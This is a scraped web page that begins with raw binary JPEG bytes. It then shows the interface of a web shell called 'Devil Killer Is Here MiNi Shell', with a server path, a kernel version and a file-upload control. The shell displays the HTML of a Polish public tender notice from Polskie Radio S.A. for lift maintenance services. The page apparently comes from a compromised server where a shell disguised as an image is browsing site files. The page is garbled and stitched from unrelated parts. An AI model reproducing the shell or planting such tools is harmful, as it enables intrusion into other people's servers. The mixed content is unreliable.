JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230427/0019582201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa w zakresie przeglądu technicznego, konserwacji oraz pogotowia dźwigowego (dozoru technicznego), dźwignika przemysłowego, dźwigów osobowych oraz platform dla osób niepełnosprawnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Polskie Radio - Spółka Akcyjna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010420591</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Niepodległości 77/85</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-977</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48226459291</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@polskieradio.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.prsa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność polegająca na produkcji programów wraz z ich nadawaniem </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa w zakresie przeglądu technicznego, konserwacji oraz pogotowia dźwigowego (dozoru technicznego), dźwignika przemysłowego, dźwigów osobowych oraz platform dla osób niepełnosprawnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a90f916a-e436-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00195822</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://polskieradio.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://polskieradio.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu art. 2 pkt 4) ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t. jedn. Dz. U. z 2020 r. poz. 344), tj.: elektronicznej Platformy Przetargowej Polskiego Radia S.A. dostępnej pod adresem: https://polskieradio.logintrade.net (dalej zwana: „Platformą”). Niniejsze postępowanie znajduje się w wykazie postępowań prowadzonych przez Zamawiającego zamieszczonym na Platformie pod adresem: https://polskieradio.logintrade.net/rejestracja/ustwowe.html. <br/>2.	We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się następującym znakiem sprawy: PRSA-BZP.27.10.2023 <br/>3.	Komunikacja ustna, telefoniczna dopuszczalna jest jedynie w odniesieniu do informacji, które nie są istotne, tj. w przypadku konieczności uzyskania informacji technicznych lub porządkowych związanych z niniejszym postępowaniem. Treść i przebieg rozmów będzie dokumentowany przez Zamawiającego. W pozostałych przypadkach wymagana jest komunikacja przy wykorzystaniu Platformy. Z wyjątkiem wskazanym w pierwszym zdaniu, Platforma służyć będzie do wymiany wszelkich pism, zawiadomień i informacji związanych z niniejszym postępowaniem, w szczególności wyjaśnień treści SWZ, modyfikacji treści SWZ, dotyczących przedłużenia terminu składnia ofert, wezwania do uzupełnienia dokumentów lub złożenia wyjaśnień, dotyczące dokonania poprawy omyłek, wyboru oferty najkorzystniejszej, przedłużenia terminu związania ofertą i innych wymaganych ustawą. <br/>4.	Użytkowanie Platformy jest bezpłatne. <br/>5.	Przeglądanie postępowań, pobieranie dokumentów, składanie wniosków o wyjaśnienie treści SWZ, składanie ofert nie wymaga rejestracji, ani logowania na Platformie. <br/>6.	W niniejszym postępowaniu Zamawiający zaleca rejestrację oraz logowanie, co najmniej, przy składaniu oferty, wyjaśnień, dokumentów lub oświadczeń w odpowiedzi na wezwania Zamawiającego kierowane w toku badania i oceny ofert. <br/>7.	Rejestrując się albo logując wykonawcy, akceptują warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie:<br/>https://polskieradio.logintrade.net/rejestracja/regulamin.html. <br/>8.	Szczegółowe zasady korzystania z Platformy, w tym wymagania sprzętowo – techniczne umożliwiające korzystanie z Platformy, szczegółowy sposób składnia, zmiany i wycofania ofert, przekazywania oświadczeń, dokumentów zostały określone w Instrukcji korzystania Platformy Przetargowej Polskiego Radia S.A., stanowiącej Załącznik nr 9 do SWZ (dalej też: Instrukcja). <br/>9.	Osobą uprawnioną do kontaktu z wykonawcami w niniejszym postępowaniu jest p. Jarosław Malczyk – Biuro Zamówień Publicznych, tel.: 22 645 9291.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że będzie przetwarzał dane osobowe uzyskane w trakcie postępowania, w szczególności dane osobowe ujawnione w dokumentach i oświadczeniach składanych w postępowaniu oraz dane osobowe uzyskane w trakcie realizacji zamówienia i umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PRSA-BZP.27.10.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usługi w zakresie przeglądu technicznego, konserwacji oraz pogotowia dźwigowego (nadzoru technicznego), dźwignika przemysłowego, dźwigów osobowych oraz platform dla osób niepełnosprawnych, zainstalowanych w obiektach Polskiego Radia S.A. w Warszawie. <br/>2.	Szczegółowy opis przedmiotu zamówienia zawarty jest w OPZ (Opis Przedmiotu Zamówienia), stanowiącym Załącznik nr 1 do SWZ. <br/>3.	Przedmiot zamówienia będzie realizowany zgodnie z warunkami zamówienia określonymi w projektowanych postanowieniach umowy, stanowiących Załącznik nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50531400-0 - Usługi w zakresie napraw i konserwacji dźwigów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Opis kryteriów oceny ofert i sposobu dokonania oceny ofert zawarty jest w Rozdziale XVIII SWZ, która opublikowana zostanie na stronie internetowej, na której jest prowadzone postępowanie i na której będą dostępne wszelkie dokumenty związane z prowadzonym postępowaniem, tj.: https://polskieradio.logintrade.net.<br/>2. Zamawiający oceni złożone oferty oraz dokona wyboru oferty najkorzystniejszej w oparciu o kryterium: cena oferty brutto „Cena-O” – waga 100%, przy czym 1% = 1 pkt. <br/>3. Punkty w ww. kryterium „Cena-O” będą obliczane z zastosowaniem następującego wzoru: cena (brutto) oferty „Cena-O” równa się ilorazowi najniższej ceny (brutto) oferty spośród wszystkich rozpatrywanych ofert i ceny (brutto) oferty badanej pomnożony przez100. <br/>4. Szczegółowe informacje dotyczące opisu kryteriów oceny ofert i sposobu dokonania oceny ofert zostały zawarte w Rozdziale XVIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej.<br/>2..	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1)	wykażą że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, należycie wykonał (tj. świadczył, zrealizował, zakończył) co najmniej 2 zamówienia (umowy) polegające na konserwacji urządzeń technicznych w postaci dźwigów osobowych i towarowych, każda na kwotę nie mniejszą niż 75 .000,00 zł netto*. <br/>Wykazując spełnienie określonego warunku dotyczącego zdolności zawodowych wykonawcy mogą legitymować się zamówieniami (umowami) nadal realizowanymi, przy czym w takim przypadku do wykazania warunku brana będzie, przez Zamawiającego, tylko ta część umów, która przed upływem terminu składnia ofert została faktycznie wykonana (tj. zrealizowana, zakończona). <br/>*Wartości podane w dokumentach potwierdzających spełnianie warunku udziału w postępowaniu w walutach innych niż PLN wykonawca, a także Zamawiający przeliczy według średniego kursu NBP na dzień zamieszczenia ogłoszenia o zamówieniu dotyczącego przedmiotowego postępowania w Biuletynie Zamówień Publicznych. <br/>2)	wykażą, iż do realizacji przedmiotu zamówienia skierują: <br/>a)	co najmniej 4 osoby: <br/>- posiadające aktualne zaświadczenie kwalifikacyjne, o którym mowa w art. 23 ust. 5 ustawy z dnia 21 grudnia 2000 r. o dozorze technicznym (t. jedn. Dz. U. z 2022 r. poz. 1514 ze zm.). Zaświadczenie kwalifikacyjne, o którym mowa w zdaniu pierwszym, musi dotyczyć urządzeń technicznych wymienionych w Tabeli nr 2, wiersz nr 12, kolumna „a” (Dźwigi osobowe i towarowe), kolumna „b” (Dźwigi osobowe, towarowo-osobowe i towarowe z napędem elektrycznym oraz Dźwigi osobowe, towarowo-osobowe i towarowe z napędem hydraulicznym oraz pneumatycznym), załącznika nr 3 do Rozporządzenia Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych (Dz. U. z 2019 r. poz. 1008); <br/>- posiadające doświadczenie w świadczeniu usług polegających na konserwacji urządzeń technicznych w postaci dźwigów osobowych i towarowych – minimum 2 zrealizowane, w ostatnich trzech latach, przed upływem terminu składania ofert, usługi/zamówienia/umowy. <br/>b)	co najmniej 1 osobę: <br/>- posiadającą aktualne zaświadczenie kwalifikacyjne, o którym mowa w art. 23 ust. 5 ustawy z dnia 21 grudnia 2000 r. o dozorze technicznym (t. jedn. Dz. U. z 2022 r. poz. 1514 ze zm.). Zaświadczenie kwalifikacyjne, o którym mowa w zdaniu pierwszym, musi dotyczyć urządzeń technicznych wymienionych w Tabeli nr 2, wiersz nr 5, kolumna „a” (Dźwigniki), kolumna „b” (Dźwigniki do podnoszenia ładunków, w tym pojazdów), załącznika nr 3 do Rozporządzenia Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych (Dz. U. z 2019 r. poz. 1008);<br/>- posiadającą doświadczenie w świadczeniu usług polegających na konserwacji urządzeń technicznych w postaci dźwigników – minimum 2 zrealizowane, w ostatnich trzech latach, przed upływem terminu składania ofert, usługi/zamówienia/umowy. <br/>c)	co najmniej 1 osobę: <br/>- posiadającą aktualne zaświadczenie kwalifikacyjne, o którym mowa w art. 23 ust. 5 ustawy z dnia 21 grudnia 2000 r. o dozorze technicznym (t. jedn. Dz. U. z 2022 r. poz. 1514 ze zm.). Zaświadczenie kwalifikacyjne, o którym mowa w zdaniu pierwszym, musi dotyczyć urządzeń technicznych wymienionych w Tabeli nr 2, wiersz nr 9, kolumna „a” (Urządzenia dla osób niepełnosprawnych), kolumna „b” (Urządzenia dla osób niepełnosprawnych), załącznika nr 3 do Rozporządzenia Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych (Dz. U. z 2019 r. poz. 1008); <br/>- posiadające doświadczenie w świadczeniu usług polegających na konserwacji urządzeń technicznych przeznaczonych dla osób niepełnosprawnych – minimum 2 zrealizowane, w ostatnich trzech latach, przed upływem terminu składania ofert, usługi/zamówienia/umowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Informacja z Krajowego Rejestru Karnego w zakresie określonym w Rozdziale VIII ust. 1 pkt 1) – 2) oraz pkt 4) [w zakresie podstaw wykluczenia określonych w art. 108 ust. 1 pkt 1, 2 oraz pkt 4 ustawy Pzp] – wystawionej nie wcześniej niż 6 miesięcy przed złożeniem informacji; <br/>2. Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie określonym w Rozdziale VIII ust. 1 pkt 10) [w zakresie podstaw wykluczenia określonych w art. 109 ust. 1 pkt 1) ustawy Pzp], wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem. W przypadku zalegania, przez wykonawcę, z opłacaniem podatków lub opłat wraz z zaświadczeniem, o którym mowa w zdaniu pierwszym, wykonawca składa dokumenty potwierdzające, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; <br/>3. Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie określonym w Rozdziale VIII ust. 1 pkt 10) [w zakresie podstaw wykluczenia określonych w art. 109 ust. 1 pkt 1) ustawy Pzp], wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem. W przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem, o którym mowa w zdaniu pierwszym, wykonawca składa dokumenty potwierdzające, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; <br/>4. Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w ust. 1 pkt 1) (składanego wraz z ofertą), w zakresie niezalegania przez wykonawcę z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (t. jedn. Dz. U. z 2023 r. poz. 70) – w celu potwierdzenia braku podstaw wykluczenia o których mowa w Rozdziale VIII ust. 1 pkt 10) [podstawa wykluczenia określona w art. 109 ust. 1 pkt 1) ustawy Pzp]. Stosowny wzór przedmiotowego oświadczenia stanowi Załącznik nr 6 do SWZ;<br/>5. Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w Rozdziale ust. 1 pkt 1) (składanego wraz z ofertą), w zakresie informacji, że istotne zobowiązania wynikające z wcześniejszej umowy w sprawie zamówienia publicznego lub umowy koncesji, wykonawca wykonał należycie i w związku z tym nie doszło do ich wypowiedzenia lub odstąpienia od nich, do odszkodowania, wykonania zastępczego lub realizacji uprawnień z tytułu rękojmi za wady – w celu potwierdzenia braku podstaw wykluczenia o których mowa w Rozdziale VIII ust. 1 pkt 11) [podstawa wykluczenia określona w art. 109 ust. 1 pkt 7) ustawy Pzp]. Stosowny wzór przedmiotowego oświadczenia stanowi Załącznik nr 6 do SWZ; <br/>6. Oświadczenia wykonawcy, w zakresie określonym w Rozdziale VIII ust. 1 pkt 5) SWZ [w art. 108 ust. 1 pkt 5) ustawy Pzp], o braku przynależności z innym wykonawcą, który złożył ofertę w niniejszym postępowaniu do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, a w przypadku zaistnienia ww. okoliczności – oświadczenia o przynależności z innym wykonawcą, który złożył ofertę w niniejszym postępowaniu do tej samej grupy kapitałowej i dokumentów lub informacji potwierdzających przygotowanie oferty niezależnie od ww. innego wykonawcy. Wzór oświadczeń zawiera Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz wykonanych zamówień (umów), wg wzoru stanowiącego Załącznik nr 4 do SWZ, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których zamówienia (umowy) zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te zamówienia (umowy) zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są: <br/>a) referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego zamówienia (umowy) zostały wykonane należycie, bądź są nadal realizowane należycie. W przypadku zamówień (umów) nadal realizowanych, referencje, bądź inne dokumenty potwierdzające ich należyte wykonywanie, powinny być wystawione w okresie ostatnich 3 miesięcy, <br/>b)	oświadczenie wykonawcy – jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów, wymienionych powyżej. <br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji zamówień (umów) wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa w pkt. 1) lit. a), musi dotyczyć wyłącznie zamówień, w których wykonaniu wykonawca bezpośrednio uczestniczył; <br/>2. Wykaz osób, skierowanych przez Wykonawcę do realizacji przedmiotowego zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacjami o podstawie do dysponowania tymi osobami, sporządzony wg wzoru stanowiącego Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Składając ofertę, poza oświadczeniami i dokumentami, o których mowa w Rozdziale X ust. 1, wykonawcy zobowiązani są przedłożyć:<br/>1)	wypełniony Formularz oferty – wg wzoru stanowiącego Załącznik nr 2 do SWZ. <br/>2)	pełnomocnictwo – w przypadku, gdy: <br/>a)	wykonawca ustanawia pełnomocnika (pełnomocników) do reprezentowania go w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego; <br/>b)	ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia. <br/>W pełnomocnictwie należy określić zakres 